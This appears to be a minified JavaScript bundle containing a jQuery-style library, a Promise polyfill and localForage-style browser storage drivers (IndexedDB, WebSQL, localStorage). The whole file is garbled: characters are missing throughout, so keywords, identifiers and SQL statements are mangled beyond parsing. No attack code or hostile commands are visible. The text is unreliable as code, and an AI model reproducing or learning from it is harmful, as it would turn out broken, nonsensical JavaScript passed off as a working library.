eoy)xhsauCd|{,=}T{,=cnee\"E{edSae0gtepneedrfnto()vrti()i(s{=}wietO.xca)[[]tLwrae)=[]tsetLwrae)}eunnl=tnl:}gtlRsosHaesfnto({euncanl}steusHae:ucinet{eunnl=c&eTetLwrae)=[.ooeCs(]|,[]t,hs,vrieieyefnto()rtr ul=&(.ieyee,hs,ttsoefnto()vrti()fcEawy([.tts)es o( next=xt,[];eunti}aotfnto()vrte|;euni&.br()k0t,hs}i(.rms()hul(t|.r|C.rf+\".elc(tC.rtcl\"/)htp=.ehd|.ye|.ehd|.yehdtTps(.aaye|*)tLwrae)mthM|[\",ul=.rsDmi)lrcetEeet\"\";r{.rfhullhe=.rfhcosoanB.rtcl\"/+ths!lpooo+/\"lhs}ac()hcosoan!}i(.aa&.rcsDt&\"tig!tpo .aa&hdt=.aa(.aahtaiinl)_(thnE,)eunE(=.vn&hgoa)&=watv+&weettigr\"jxtr\",.yehtp.opeCs(,.aCnet!tts(.ye,=.r.elc(t\")hhsotn?.aa&.rcsDt&0=(.otnTp|\")idxf\"plcto/-w-omulnoe\"&(.aahdt.elc(t\"\")(=.r.lc(.egh,.aa&hpoesaa|srn\"=yefhdt)&o=k.eto?&:?)hdt,eeehdt)!==.ah&(=.elc(t\"1)d(tts()\"\"\"\"+_\"E++)hulod,.foiid&wlsMdfe[]&.eRqetedr\"fMdfe-ic\"wlsMdfe[],.tgo&EsteusHae(I-oeMth,.tgo),hdt&hhsotn&!!=.otnTp|ncnetye&EsteusHae(CnetTp\"hcnetye,.eRqetedr\"cet,.aaye[]&.cet[.aaye[]?.cet[.aaye[]+\"\"=hdtTps0?,\"$+;q00\"\")hacps\"\")frpi .edr).eRqetedrphhaesp)i(.eoeed&!==.eoeedcl(,,)|)rtr .br(;fC\"br\"madhcmlt)Edn(.ucs)Efi(.ro)i_(thnE)i(.edSae1f&.rge(aaSn\"[,],)eunEhayc&.ieu>&(=.eTmotfnto({.br(tmot),.ieu);r{=1isn(,)cthe{fctrwek-,)}lek-,N rnpr\";ucinktnrs{a ,,,,,=;|(=0u&.laTmotu,=od0as|\"Eraytt=>?:,=>20&<0|34=tr&bX(,,),=thbEl,?hiMdfe&(TEgtepneedr\"atMdfe\")&wlsMdfe[]T,TEgtepneedr\"tg)&(.tgo=),0==|\"ED==.yeC\"ootn\"34=tC\"omdfe\"(=.tt,=.aal!dberr):dC!&C|C\"ro\"t0&t0),.ttstEsauTx=n|)\",?.eovWt(,pCE)vrjcWt(,ECd)EsauCd()xvi ,&ytigrl\"jxucs\"\"jxro\"[,,?:],.ieihg[,],&(.rge(aaCmlt\"[,],-.cie|.vn.rge(aaSo\")}eunE,eJO:ucinetn{eunwgtetn\"sn),eSrp:ucinet{eunwgtevi ,,srp\"})wec(\"e\"\"ot]fnto(,)wt=ucinenri{eungn&(=|rrnnvi )waa(.xed{r:,yetdtTp:,aanscesr,.sliOjc()&)})w_vlr=ucine{eunwaa(uletp:GT,aaye\"cit,ah:0ayc!,lbl!,trw\"!}}wf.xed{rpl:ucine{a ;eunti[]&ge&(=.alti[])tweti[]onrouet.q0.ln(0,hs0.aetoe&.neteoeti[],.a(ucin)vreti;hl(.isEeethl)=.isEeethl;eune)apn(hs)ti}waInrfnto()rtr ()ti.ahfnto()wti)waInrecl(hst))ti.ahfnto({a =(hs,=.otns)nlnt?.rpl()tapn()),rpfnto()vrtge;eunti.ahfnto()wti)waAltecl(hsn:)),nrpfnto()rtr hsprn()nt\"oy)ec(ucin)wti)rpaeihti.hlNds},hs},.xrpedshde=ucine{eunwep.suo.iil(),.xrpedsvsbefnto()rtr!(.fstit|eofeHih|egtletet(.egh}waaStig.h=ucin)tyrtr e .MHtRqetcthe{}vrV=02012:0}G=.jxetnsxr)hcr=!t&wtCeetasi thaa=t!G,.jxrnpr(ucint{a ,;fhcr|G&!.rsDmi)eunsn:ucinio{a ,=.h(;fsoe(.yetultayctuenm,.asod,.hFed)o( ntxrilssa=.hFed[]tmmTp&soerdMmTp&soerdMmTp(.ieye,.rsDmi|i\"-euse-ih]|i\"-euse-ih]\"MHtRqet)frai ).eRqetedraia)nfnto()rtr ucin)n&nrsola=.nro=.nbr=.nieu=.nedsaehnenl,aot==?.br(:err==?nme\"=yefssau?(,err)ossau,.ttset:(tssau]|.ttsssauTx,tx\"=(.epneye|tx\"|\"tig!tpo .epneet{iaysrsos}{etsrsosTx}sgtlRsosHaes))}sola=(,=.nro=.nieu=(err)vi !=.nbr?.nbr=:.nedsaehnefnto({==.edSae&.eTmotfnto({&r)),=(aot)tyssn(.aCnet&.aa|ul}ac()i()ho },br:ucin)n&(}},.jxrfle(ucine{.rsDmi&(.otnssrp=1},.jxeu(acps{cit\"etjvsrp,apiainjvsrp,apiainemsrp,apiainxemsrp\",otns{cit/b?jv|casrp\\/,ovres{tx cit:ucine{eunwgoaEa()e})waaPeitr\"cit,ucine{od0=ecce&ecce!)ecosoan&etp=GT))waaTasot\"cit,ucine{fecosoan{a ,;eunsn:ucinio{=(<cit\".rp{hre:.cithre,r:.r}.n\"oderr,=ucine{.eoe)nnl,&o\"ro\"=etp?0:0,.ye},.edapnCidt0),br:ucin)n&(}})vrY=]Q=()??&$|??;.jxeu(jop\"alak,snClbc:ucin)vreY.o(|wepno\"\"E+;eunti[]!,})waaPeitr\"snjop,ucintnr{a ,,,=1=tjop&Q.ettul?ul:srn\"=yeftdt&0=(.otnTp|\")idxf\"plcto/-w-omulnoe\"&Q.ettdt)&dt\";fs|jop==.aaye[]rtr =.snClbc=(.snClbc)tjopalak)tjopalaksts=[]rpaeQ,$\"i:1=tjop&tul=k.ettul?&:?)tjop\"\"i,.ovres\"citjo\"=ucin)rtr |werri\"wsntcle\",[],.aaye[]\"sn,=[]ei=ucin)aagmns,.lasfnto({od0=owe.eoerpi:[]oti&(.snClbc=.snClbc,tps(),&go&oa0)aovi },srp\")hcetHMDcmn=ucin)vreripeetto.raeTLouet\")bd;euneinrTL\"fr>/om<om<fr>,==.hlNdslnt})wpreTLfnto(,,)i(srn\"=yefertr[;boen=tpo &(=,=1;a ,,;eunt|hcetHMDcmn?(=tripeetto.raeTLouet\").raelmn(bs\")he=.oainhe,.edapnCidi)tr,=.xce,=n&]o[.raelmn([]](=e[]ta,&alnt&wa.eoe)wmre[,.hlNds),.nla=ucinetn{a ,,,=hsseidxf\"\";euns-&(=tesies)eesie0s)gt?nttvi )t&ojc\"=yeft&i\"OT)alnt>&waa(uletp:|\"E\"dtTp:hm\"dt:}.oefnto()oagmnsahm(?(<i>)apn(.asHM().idr:))awy(&fnto(,)aec(ucin)napyti,|[.epneette)))ti}wec(\"jxtr\"\"jxtp,aaCmlt\"\"jxro\"\"jxucs\"\"jxed]fnto(,)wf[]fnto()rtr hso(,)},.xrpedsaiae=ucine{eunwge(.iesfnto()rtr ==.lm)lnt}wofe=stfstfnto(,,)vrrioasulcwcse\"oiin)fwe,=}\"ttc==&(.tl.oiin\"eaie)sfofe(,=.s(,tp)uwcse\"et)(=\"boue==|\"ie\"=c&(+)idxf\"uo)-)(=rfpsto()tpirlf)(=asFoto|0iprela()|)gt&(=.alenwetn(}s),ul=.o&(.o=.o-.o+)nl!tlf&(.ettlf-.eti,uigi ?.sn.alep:.s()}wf.xed{fstfnto()i(ruet.eghrtr od0=eti:hsec(ucint{.fststfstti,,))vrtnrti[]i()eunrgtletet(.egh(=.eBudnCinRc(,=.weDcmn.ealVe,tpttpnpgYfstlf:.etnpgXfst){o:,et0}psto:ucin)i(hs0)vretnrti[]i{o:,et0;f\"ie\"=wcsr\"oiin)trgtonigletet)es{=hsofe(,=.weDcmn,=.fstaet|.ouetlmn;hl(&(==.oy|==.ouetlmn)&sai\"=wcse\"oiin)eeprnNd;&e=r&==.oeye&(=()ofe()tp=.s(,breTpit\"!)ilf+wcse\"odretit\"!)}euntpttpitpwcsr\"agno\"!)lf:.etilf-.s(,mriLf\"!)},fstaetfnto({eunti.a(ucin)vreti.fstaetwiee&sai\"=wcse\"oiin)eeofePrn;eune|e)},.ah{colet\"aeOfe\"srlTp\"aeOfe\",ucinet{a =pgYfst==;.ne=ucinr{eunzti,ucineri{a ;fye?=:==.oeye&oedfutiw,od0=irtr ?[]er;?.colonopgXfstiniopgYfst:[]i,,,ruet.egh})wec(\"o\"\"et]fnto(,)wcsok[]_(.iePsto,ucinen{fnrtr =eet,ets()we.oiin)t+p\"n))wec(Hih:hih\"Wdh\"it\",ucinet{.ah{adn:inr+,otn:,\"\"ue\"e,ucinnr{.nr=ucinio{a =ruet.egh&n|boen!tpo )sn|!==|!==?mri\"\"odr)rtr (hsfnto(,,)vrortr ()0=ridxf\"ue\"?[inr+]tdcmn.ouetlmn[cin\"e:==.oeye(=.ouetlmn,ahmxtbd[srl\"e,[srl\"e,.oy\"fst+]o\"fst+]o\"let+])vi ==?.s(,,)wsyetnis}taivi ,)}},.ah\"lrfcsfcsnfcsu eiesrl lc bcikmueonmuepmueoemuevrmueu osetrmueev hneslc umtkyonkyrs eu otxmn\"slt\"\",ucinet{.nt=ucinen{eunagmnslnt>?hso(,ulen:hstigrt})wf.xed{oe:ucinet{eunti.osetre.oslaet|)},.netn(bn:ucinetn{eunti.nenl,,),nidfnto(,)rtr hsofenl,),eeaefnto(,,,)rtr hso(,,,),neeaefnto(,,)rtr ==ruet.eghti.f(,*\":hsofte|*\"n})wpoyfnto(,)vrnrii(srn\"=yeft&net,=,=)ge)eunrocl(ruet,)ifnto({euneapyt|hsrcna(.alagmns)}igi=.udegi|wgi+,}whlRayfnto()ewrayat+wray!),.sra=ra.sra,.asJO=SNprewndNm=,.sucingwiWno=,.aeCs=,.yexwnwDt.o,.suei=ucine{a =.yee;eun\"ubr==|\"tig==)&iNNeprela()}\"ucin=tpo eie&eiead&eie\"qey,]fnto({eunw)vrJ=.QeyK=.;eunwnCnlc=ucint{eune$=w&e$K)t&.Qey=w&ejur=t,}t|ejur=.=)w)\r/ iesdudrteSrasetovre 070-6/uesrc\"vrscsc|}scfrBne=ucin)rtr{idfnto(,)vrctyi(=(#+)ci(iptnt\"bto,ceko,rdo:ie) etra)|.s\"eet){fcvlb,nn\"=.s(dsly)&od0=.tr\"aawdetp\")vrdcat(dt-igtye)\"aeikr=dcdtpce(udt\"b:rtn\"=?.aig\"pae,)\"ldr=d&.ldr\"eVle,asFotb)}leci(iptceko\"?.rp\"hce\"\"ola\"=yefb&|\"tig=tpo &\"n=b:(iptnm=++])i(iptrdo)$'nu[ae\"++\"[au='b'])po(cekd,0:.s\"nu:ie)rtr }ac()},seVlefnto(,)vrctyrtr =(#+)ci(iptnt\"bto,ceko,rdo:ie) etra)|.s\"eet)cvl)=:.s\"nu:hcbx)cpo(cekd)=\"ola\"=yefb&)|srn\"=yefb&o\"=:(iptnm=++])i(iptrdo)1=(iptnm='a']vle\"++\"'.rp\"hce\":ci(iptfl\"&(=SNpreb,.egh=&(.aet(t\".id\"ulaig)fn(u\".mt(,.aa\"ie\"b)$ec(,ucinab{a =(<i<l>)cprns\"d)fn(.podn\".id\"l)apn()dflUlae(fl:nm:.ie}},.egh0(.lss(dv)hd(,.aet(t\".id\"ulaig)so()(.lss(dv)so(,.aet(t\".id\"ulaig)hd(),1}ac()}}(;qahih=ucint{a ,=,=,=e ra;()ec(ucin)i(=(hs,()hih(at\",oPsinepsto(.o,!tpoto)frcreti=;urnDvnlnt;urnDv+i0&[urnDv.egti;.egh0htpoto,=.egt)nps()es .uhe,=<.egt)ehih(:;o(urnDv0creti<.eghcreti+)>&ncreti]hih()),(idw.n\"od,ucin)eulegtscatv_he_eetr},(idw.eiefnto({qahih(s.ciesetslco))/!oyih C 0221 rmisou & B|Srasetovre.o*\r/!\n*scfrsoae-v..\r /\nuesrc\"!ucin)vretno!ucin)vrr{,=}efnto(,,)re=dp:,alakn}ontfnto()i(.ekse=,[]rtr []i([]{,re)ho e ro(Cudntfn oue\"e;o(a ,=[]sadp,=.alakl[,=,=.eghfuu+lps(eprs==[]n{:(ucint{f\"\"=tcaA()rtr ;o(a =.pi(/)oeslt\"\".lc(,1,=,=.eghirr+{a =[]i(.\"=aopp)es{f\"\"=acniu;.uha}rtr .on\"\"}su))vrdcapyti,)rtr []n|}(,(poieal,\"/tl\"\"xot\",ucinet{ucinne{a =hsi(oe)ho e yero(Yums asa ra oal\";eunnwtfnto(,)fnto (,)ae=,=-s&()vria[,=.egh0=s&(];o(a =;<.eghc+iec,&rite)ite(ucine{eunfnto()oet}()n:(,))vroeiAryreiFnto;.l=},(poieaa\"[eprs]fnto()fnto ({o(a =;<.eghe+{a =[](,[]([]}=]fnto (,)1=sps(et)&(}a ,=udfnd!tpo idwwno:}irMttoOsre|rWbiMttoOsre,=udfnd!tpo lblgoa:od0=ti?idwti,=]o\"neie\"=yefpoes&[betpoes\"={.otigcl(rcs)fnto({eunfnto({rcs.etikt}(:?ucin)vre0nnwit,=ouetcetTxNd(\";eunnosreo{hrceDt:0)fnto({.aae+e2})fnto({eunfnto({.eTmott1}(,.spn)e\"rms/ofg,\"xot\",ucine{ucintet{eun2=agmnslnt?[]vi([]t}a =isrmn:1;.ofgnecniuet)e\"rms/oyil,\"/rms\"\"/tl\"\"xot\",ucinetn{ucino)vre\"rms\"ne\"neie\"=yefgoa?lbl\"neie\"=yefwno&wno.ouetwno:ef&\"eov\"nePoie&rjc\"nePoie&ali .rms&\"aei .rms&fnto({a ;eunnwePoiefnto()te)it})|ePoier}a =.rms,=.sucinnplfl=},(poiepoie,\"/ofg,.uis,.al,.rc\"\"/eov\"\"/eet,.aa\"\"xot\",ucinetnorias{ucince{f!()trwnwTpErr\"o utps eovrfnto stefrtagmn otepoiecntutr)i((hsisaco )trwnwTpErr\"aldt osrc Poie:Pes s h nw prtr hsojc osrco antb alda ucin\";hs_usrbr=]leti)fnto (,)fnto ()pte}ucinoe{(,)tyeno}ac()oe}fnto (,,,)vrriascSn;fctyrno,=0cthe{=0iees =,=0mtr|(&aptr:?(,)e=Cptr:==&vtr)fnto (,,,)vrre_usrbr,=.eghri=,[+]nriD=}ucindet{o(a ,,=.sbciesie_eala0arlnt;+3nra,=[+]utnoi;.sbciesnl}ucinmet{a ,=ultyi(==)ho e yero(Apoie alakcno eunta aepoie\";fwt&(=.hnSo)rtr .altfnto()rtr!n|n!,odt=opeo:(,)),ucint{eun!|(=0vi (,)},0ctht{eun!|((,)!)rtr!}ucinpet{==?(,)met|het}ucinhet{.sae=O&e_tt=,.dti=,.sn(,)}ucinvet{.sae=O&e_tt=,.dti=,.sn(,)}ucinge{(,.saeC}ucinbe{(,.saeD}a =.ofgw(.ofgr,.betrucin,=.sucin_(.o,.l)xorc,=.eov,=.eetEaaa;.sn=;a =od0A0C1D2cpooye{osrco:,saevi ,dti:od0_usrbr:od0te:ucinet{a =hsonwti.osrco(ucin)};fti.sae{a =ruet;.sn(ucin)un_tt,,[.sae1,.dti))es (hsoet;euno,ac:ucine{eunti.hnnl,)}cal_crc=,.eov=,.eetksPoiec)e\"rms/ae,\"/tl\"\"xot\",ucinet{ucinne{a =hsi(oe)ho e yero(Yums asa ra orc.)rtr e (ucintn{o(a ,=;<.eghr+oer,&\"ucin=tpo .hnote(,)to}}a =.sra;.aen)e\"rms/eet,\"xot\",ucine{ucinte{eunnwti(ucintn{())erjc=},(poiersle,\"xot\",ucine{ucinte{eune&ojc\"=yefe&.osrco==hsenwti(ucint{())erslet)e\"rms/tl\"[eprs]fnto()fnto ()rtr ()|ojc\"=yefe&ul=efnto ()rtr\"ucin=tpo }ucinoe{eun[betAry\"=Ojc.rttp.otigcl()vrrDt.o|fnto({eunnwDt)gtie);.betrucinteiFnto=,.sra=,.o=},(poieplfl\".oyil)(,ucin)fnto ()vrtti,=d:ul;fefrvroi )[]eo;eunnwdfnto(,)vrrmoe(.aenvrin;.nro=ucin)orerr}rougaeeddfnto({.eutcetOjcSoensoeae}roscesfnto({.brrsl,.dIf=,(})fnto (,)vrnti;srn\"=yefe&wno.osl.ane\"ue saky u ti o tig\",=tige)vronwdfnto(,)nray)te(ucin)vrrn_bnoird.rnato(.trNm,raol\".bettr(.trNm)aigte;.nucs=ucin)vrearsl;od0=e&enl)te}aoerrfnto({(.ro)}.ac())rtr (,)ofnto (,)vrnti,=e (ucinto{.ed(.hnfnto({a =.dIf,=.btascinrsoeae\"edny)ojcSoersoeae,=.pnusr)aoscesfnto({a =.euti()vroenvlenky;od0=oto:.otne)es (}aoerrfnto({(.ro)}.ac())rtr (,)ofnto (,,)vroti;srn\"=yefe&wno.osl.ane\"ue saky u ti o tig\",=tige)vrrnwdfnto(,)oray)te(ucin)vrio_bnoaid.rnato(.trNm,rawie)ojcSoeisoeae;ul=t&tvi )vrsaptte;.nucs=ucin)vi ==&(=ul,(),.nro=ucin)rserr})cthr};eunurn,}ucinret{a =hs\"tig!tpo &(idwcnoewr(+ sda e,bti sntasrn.)eSrn();a =e (ucinto{.ed(.hnfnto({a =.dIf,=.btascinrsoeae\"edrt\".bettr(.trNm)aidlt()aoscesfnto({(}aoerrfnto({(.ro),.nbr=ucine{a =.agterr\"utEceeErr==&ot})ctho};eunuot,}ucinie{a =hsnnwdfnto(,)tray)te(ucin)vrot_bnorod.rnato(.trNm,rawie)ojcSoeosoeae,=.la(;.nucs=ucin)e),.nro=ucin)nierr})cthn};eunune,}ucinae{a =hsnnwdfnto(,)tray)te(ucin)vrot_bnorod.rnato(.trNm,raol\".bettr(.trNm)ircut)ioscesfnto({(.eut}ioerrfnto({(.ro)}.ac())rtr (,)nfnto (,)vrnti,=e (ucinto{eun0evi (ul:odnray)te(ucin)vrrn_bnoird.rnato(.trNm,raol\".bettr(.trNm)a!,=.pnusr)soscesfnto({a =.eutrtr ?od0=etnky:?(.e)(=0navnee):odtnl),.nro=ucin)oserr})ctho};eunlot,}ucince{a =hsnnwdfnto(,)tray)te(ucin)vrot_bnorod.rnato(.trNm,raol\".bettr(.trNm)iroeCro(,=]ioscesfnto({a =.eutrtr ?aps(.e)vi .otne):odea}ioerrfnto({(.ro)}.ac())rtr (,)nfnto (,)t&.hnfnto()tnl,),ucine{())fnto (,)t&.hnfnto()fte}fnto()te}}ucinfet{eunestieu(ucin)rtr (ult}0:od0vrd\"neie\"=yefmdl&mdl.xot?eur(poie)ti.rms,=|ti.neeD|ti.ektneeD|ti.oIdxdB|hsOneeD|ti.sneeD;fm{a =_rvr\"snSoae,iiSoaeeieaengttmtsttmormvIe:,la:,eghakysky:}\"ucin=tpo eie&eieaddfn(ayctrg\"fnto({eunp)\"neie\"=yefmdl&mdl.xot?oueeprspti.snSoaep}cl(idw,ucin)fnto ()vrtti,=}i()o(a neno=[]rtr .ePei=.ae\"\"t_bnonmrsle)fnto ()vrtti,=e (ucinen{.ed(.hnfnto({o(a =.dIf.ePei,=.egh1o=;-)vrrpkyo;==.neO()&.eoetmr}(}.ac())rtr (,)nfnto (,)vrnti;srn\"=yefe&wno.osl.ane\"ue saky u ti o tig\",=tige)vronwmfnto(,)nray)te(ucin)tyvrrn_bnoipgttmrkyrfxe;&(=(),()cthe{()}.ac())rtr (,)ofnto (,)vrnti,=e (ucinto{.ed(.hnfnto({r{o(a =.dIf.ePei,=.eghaplnt,=;>;+)vrlpkys,=.eIe()i(&(=(),od0=(=(,.usrn())rtr odtu}(}ac()oe})ctho};eundot,}ucinret{a =hsonwmfnto(,)nray)te(ucin)vrorn_bnotyopkye}ac()onl}&(=.usrn(.ePei.egh)to}.ac())rtr (,)ofnto ()vrtti,=e (ucinen{.ed(.hnfnto({o(a =.dIf,=.eghr[,=;>;+)==.e()idxfnkyrfx&rps(.e()sbtignkyrfxlnt);())cthn};eundne,}ucinae{a =hsnnwmfnto(,)tky(.hnfnto()etlnt))cthn};eundne,}ucinset{a =hs\"tig!tpo &(idwcnoewr(+ sda e,bti sntasrn.)eSrn();a =e (ucinto{.ed(.hnfnto({a =.dIf;.eoetmokyrfxe,(}.ac())rtr (,)ofnto ()i(.usrn(,)=hrtr SNpree;o(a =.usrn()nesbtigvA,=e raBfe(*.egh,=e it6ra()itlnt-;>0i-ri=.hroeti;wthn{aegrtr ;aebrtr e lb[];aeyrtr e n8ra()cs :eunnwUn8ra()cs :eunnwUn8lmeAryo;ae_rtr e n1Aryo;aeIrtr e it6ra()cs :eunnwIt2ra()cs :eunnwUn3Aryo;aeErtr e la3Aryo;aeOrtr e la6Aryo;eal:ho e ro(Ukw ye +)}ucinle{a =\"nnwUn1Arye;r{=tigfoCaCd.pl(uln}ac()frvro0onlnt;+)+Srn.rmhroeno)rtr }ucinuet{a =\"i(&(=.otig),&([betAryufr\"=etSrn(|ebfe&\"ojc raBfe]==.ufrtSrn(){a ,=; ntnefAryufr(=,+g:oebfe,[betItAry\"=nr=:[betUn8ra]==?+w\"ojc itCapdra]==?+S\"ojc n1Ary\"=nr=:[betUn1Ary\"=nr=:[betIt2ra]==?+x\"ojc it2ra]==?+k\"ojc la3Ary\"=nr=:[betFot4ra]==?+OtnwErr\"aldt e yefrBnrAry))trlo)es f\"ojc lb\"=n{a =e ieedriola=ucin)vrelti.eut;(++),.edsraBfe()es r{(SNsrniye)cthn{idwcnoeerr\"olntcnetvleit SNsrn:\"e,()}ucinfetn{a =hs\"tig!tpo &(idwcnoewr(+ sda e,bti sntasrn.)eSrn();a =e (ucinnr{.ed(.hnfnto({od0=t&tnl)vritutfnto(,)i()()es{r{a =.dIf;.eIe(.ePei+,)cthe{\"utEceeErr==.ae|N_RO_O_UT_ECE\"=enm)&()ni}))cthr};eundrn,}ucindet{&ete(ucine{(ule}fnto()te}}a =udfnd!tpo oue&oueeprsrqie\"rms\":hsPoiepnl;r{f!ti.oaSoae&sttmi hslcltrg)rtr;=hslcltrg}ac()rtr}a =_ls_:,=.eghg\"rf,=bo\"y\"i8,=u0\"S\"i8,=s1\"x\"i2,=u1\"k\"i2,=f3\"O\"l4,=+.eghC{die:lcltrgWapr,iiSoaeeieaeogttmnsttmfrmvIe:,la:,eghakyrky:}\"ucin=tpo eie&eieaddfn(lcltrgWapr,ucin)rtr }:udfnd!tpo oue&oueeprsmdl.xot=:hslcltrgWaprC.alwno)fnto({ucinee{a =hsn{bnl}i()o(a neno=srn\"=yefeo?[]tSrn(:[]rtr e (ucinor{r{.bhnnm,tignvrin,.ecito,.ie}ac()rtr .eDie(lcltrgWapr)te(ucin)rtr .iiSoaee}.hno.ac()nd.rnato(ucine{.xctSl\"RAETBEI O XSS\"nsoeae\"(dITGRPIAYKY e nqe au),]fnto({.dIf=,(}fnto(,)rt}}}}ucintet{a =hs\"tig!tpo &(idwcnoewr(+ sda e,bti sntasrn.)eSrn();a =e (ucinto{.ed(.hnfnto({a =.dIf;.btascinfnto()neeueq(SLC RM\"rsoeae\"WEEky=?LMT1,e,ucinen{a =.oslnt?.osie()vlenl;&(=(),(),ucinet{())))ctho};eundot,}ucinnet{a =hsonwpfnto(,)nray)te(ucin)vrrn_bnord.rnato(ucinn{.xctSl\"EET*FO +.trNm,]fnto(,)frvrrorw,=.egha0iaa+{a =.tma,=.au;fc&cuc)vi !=cecsky)rtr odtc}(}fnto(,)ot}}}.ac())rtr (,)ofnto (,,)vroti;srn\"=yefe&wno.osl.ane\"ue saky u ti o tig\",=tige)vrrnwpfnto(,)oray)te(ucin)vi ==&(=ul;a =;(,ucinta{fara;levrso_bnosd.rnato(ucino{.xctSl\"NETO ELC NO\"ssoeae\"(e,vle AUS(,?\"[,]fnto({(),ucinet{()),ucine{.oe=eQOAER&())}}.ac())rtr (,)rfnto (,)vrnti;srn\"=yefe&wno.osl.ane\"ue saky u ti o tig\",=tige)vronwpfnto(,)nray)te(ucin)vrrn_bnord.rnato(ucinn{.xctSl\"EEEFO +.trNm+ HR e \"[]fnto({(}fnto(,)ot}}}.ac())rtr (,)ofnto ()vrtti,=e (ucinen{.ed(.hnfnto({a =.dIf;.btascinfnto()teeueq(DLT RM\"osoeae[,ucin)e),ucinet{())))cthn};eundne,}ucinae{a =hsnnwpfnto(,)tray)te(ucin)vrot_bnood.rnato(ucint{.xctSl\"EETCUTky scFO +.trNm,]fnto(,)vronrw.tm0.;(),ucinet{())))cthn};eundne,}ucinset{a =hsonwpfnto(,)nray)te(ucin)vrrn_bnord.rnato(ucinn{.xctSl\"EETkyFO +.trNm+ HR d=?LMT1,e1,ucinen{a =.oslnt?.osie()kynl;(),ucinet{())))ctho};eundot,}ucince{a =hsnnwpfnto(,)tray)te(ucin)vrot_bnood.rnato(ucint{.xctSl\"EETkyFO +.trNm,]fnto(,)frvro[,=;<.oslnt;+).uhnrw.tmr.e)eo}fnto(,)nt}}}.ac())rtr (,)nfnto ()vrtnnwUn8ra()o\";o(=;<.eght=)+mnt>2,+m(&[]<4nt1>4,+m(5nt1)<|[+]>]o=[3nt2]rtr .egh3=?=.usrn(,.egh1+=:.egh3=&(=.usrn(,.egh2+=\",}ucinue{fesbtig0g!=)eunJO.as()vrtnoriaesbtigC,=.usrn(,)c.5alnt,=.eghu0\"\"=aalnt-]&c-\"\"=aalnt-]&-)vrfnwAryufrc,=e itAryf;o(=;>;+4nmidxfat)omidxfat1)rmidxfat2)imidxfat3)du+=<2o>,[+](5o<4r>,[+](&)<|3isic()cs :eunfcs :eunnwBo(f)cs :eunnwItAryf;aeSrtr e itAryf;ae_rtr e itCapdra()cs :eunnwIt6ra()cs :eunnwUn1Aryf;aeIrtr e n3Aryf;aeErtr e it2ra()cs :eunnwFot2ra()cs :eunnwFot4ra()dfuttrwnwErr\"nontp:\"s}fnto (,)vrn\";fe&netSrn()e&\"ojc raBfe]==.otig)|.ufr&[betAryufr\"=ebfe.otig))vrorveisaco raBfe?oer=)(=.ufr\"ojc n8ra]==?+w\"ojc itAry\"=nr=:[betUn8lmeAry\"=nr=:[betIt6ra]==?+x\"ojc it6ra]==?+k\"ojc n3Ary\"=nr=:[betUn3Ary\"=nr=:[betFot2ra]==?+O\"ojc la6Ary\"=nr=:(e ro(Fie ogttp o iayra\"),(+()}lei([betBo]==)vrinwFlRae;.nodfnto({a =(hsrsl)tvye}iraAAryufre}letytJO.tigf()}ac()wno.osl.ro(Cud' ovr au noaJO tig ,)tnl,)}ucindet{&ete(ucine{(ule}fnto()te}}a =ACEGIKMOQSUWYacegikmoqsuwy02468+\"p\"neie\"=yefmdl&mdl.xot?eur(poie)ti.rms,=hsoeDtbs,=_ls_:,=.eghb\"rf,=bo\"w\"i8,=u0\"_\"i8,=s1\"I\"i2,=u1\"E\"i2,=f3\"A\"l4,=+.eghi()vrD{die:wbQSoae,iiSoaeeieaengttmtsttmormvIe:,la:,eghakysky:}\"ucin=tpo eie&eieaddfn(wbQSoae,ucin)rtr }:udfnd!tpo oue&oueeprsmdl.xot=:hswbQSoaeD}cl(idw,ucin)fnto (,)et=ucin)vrnagmnsrtr .ed(.hnfnto({eunet.pl(,))}ucint)frvre1eagmnslnt;+)vrtagmnse;ftfrvrni ).aOnrpryn&(ruet[]n=([]?[]sie)tn)rtr ruet[]fnto ()frvrti )fahswPoet()&[]=ertr!;eun1fnto ()ti.cni=(}un,hs_rvre=ulti.ray!,hs_bnonl;o(a =;<.egho+eti,[];hsstrvrti.cni.rvr}a =udfnd!tpo oue&oueeprsrqie\"rms\":hsPoiei{,=IDXDB\"snSoae,OASOAE\"oaSoaerpe\"WBQ:wbQSoae}s[.NEED,.ESLaLCLTRG]c[cer,gttm,ieae,ky,ky\"\"egh,rmvIe\"\"eIe\",=DFN:,XOT2WNO:}u{ecito:\"die:.lc(,ae\"oafrg\"sz:903,trNm:kyaupis,eso:}flWNO;fnto\"=yefdfn&dfn.m?=.EIE\"neie\"=yefmdl&mdl.xot&(=.XOT;a =ucine{a =|eidxdB|.ektneeD|emzneeD|eOneeD|emIdxdBn{;eunnaWBQ]!eoeDtbs,[.NEED]!fnto({fvi !=.pnaaae&.aiao&envgtrueAet&Sfr/ts(.aiao.srgn)&/hoe.etenvgtrueAet)eun1tyrtr &\"ucin=tpo .pn&od0=eIBeRnecthe{eun1})naLCLTRG]!fnto({r{eunelcltrg&\"eIe\"nelcltrg&elcltrg.eIe}ac()rtr!}(,}ti)mAryiAry|ucine{eun[betAry\"=Ojc.rttp.otigcl(),=hsopooyeIDXDBaIDXDBopooyeLCLTRG=.OASOAEopooyeWBQ=.ESLopooyecni=ucine{f\"bet=tpo )i(hs_ed)eunnwErr\"a' alcni( fe oafrg a enue.)frvrti )soeae==&([]et.elc(\\/,_),hs_ofgt=[]rtr\"rvri &edie&ti.eDie(hs_ofgdie)!}eunsrn\"=yefeti.cni[]ti.cni}opooyedfnDie=ucineto{a =e (ucinto{r{a =.die,=e ro(Cso rvrntcmlat e tp:/oil.ihbi/oaFrg/dfndie\",=e ro(Cso rvrnm led nue +.die)i(e_rvrrtr odos;fne_rvr)eunvi ()frvruccna(_nttrg\",=;<.eghf+{a =[]i(m|em|\"ucin!tpo []rtr odos}a =.eov(0;_upr\"ne&pe_upr&\"ucin=tpo .spote_upr(:.eov(!.spot)pte(ucinn{[]nia=,(}o}ac()oe})rtr .hnto,}opooyedie=ucin)rtr hs_rvr|ul,.rttp.ed=ucine{a =hsnnwrfnto(,)t_rvre.hnfnto({ul=t_ed&(.rayt_nttrg(.cni),.rayte(,))cthn};eunnte(,)n,.rttp.eDie=ucineto{ucina)s_ofgdie=.rvr)vrsti;eunsrn\"=yefe&e[],hs_rvre=e (ucinto{a =.gtisSpotdrvre,=e ro(N vial trg ehdfud\";f!)euns_rvre=.eetc,odoc;fs_bnonl,.raynl,(){ff=lDFN)eunvi eur(a,ucine{.etn()t))i(==.XOT{a ;wtha{aesIDXDBurqie\"/rvr/need\";ra;aesLCLTRG:=eur(.dieslcltrg\";ra;aesWBQ:=eur(.dieswbq\"}.etn()es 